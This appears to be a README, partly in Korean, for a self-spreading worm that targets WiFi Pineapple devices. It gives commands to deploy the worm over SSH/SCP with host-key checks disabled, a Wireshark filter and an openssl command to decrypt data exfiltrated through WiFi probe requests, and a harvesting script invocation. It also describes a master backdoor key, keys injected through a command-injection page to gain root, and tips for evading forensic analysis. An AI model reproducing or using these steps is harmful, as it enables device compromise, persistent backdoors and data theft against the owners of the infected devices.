
A WiFi Pineapple infecting worm.
./build.sh
ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
참고: 구성된 장치가 있거나 metasploit-module을 사용하여 SSH를 활성화해야 합니다.
wireshark 필터:
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem
선택적으로, harvest.py 스크립트를 다음과 같이 사용하세요:
python harvest.py [monitor-iface]
| 파일 | 용도 |
|---|---|
| tv | 바이러스 본체. |
| tvbd | "마스터" 백도어 키, 개인 키를 배포하지 마십시오. |
| tvd | 프로브 요청을 통해 데이터를 유출하는 데 사용되는 유출 키. |
| tospo_rsa | 전송 키로 사용되는 각 감염 장치에 특화된 ID 개인 키. |
| tospo_rsa.pub | 명령 주입 페이지를 통해 전송되는 ID 공개 키로, 개인 ID가 원격 장치에서 root로 작업을 수행할 수 있게 합니다. |
| w | 이전 연결을 복원하는 데 사용되는 푸시된 무선 구성 옵션. |
| n | 이전 연결을 복원하는 데 사용되는 푸시된 네트워크 구성 옵션. |
| 참고: 'tv'로 시작하는 파일은 새 장치를 감염시킬 때 모두 전송됩니다. 'tv'로 시작하는 이름으로 개인 키 등을 추가하지 마십시오. 그렇지 않으면 개인 키가 포렌식 분석에 노출됩니다. |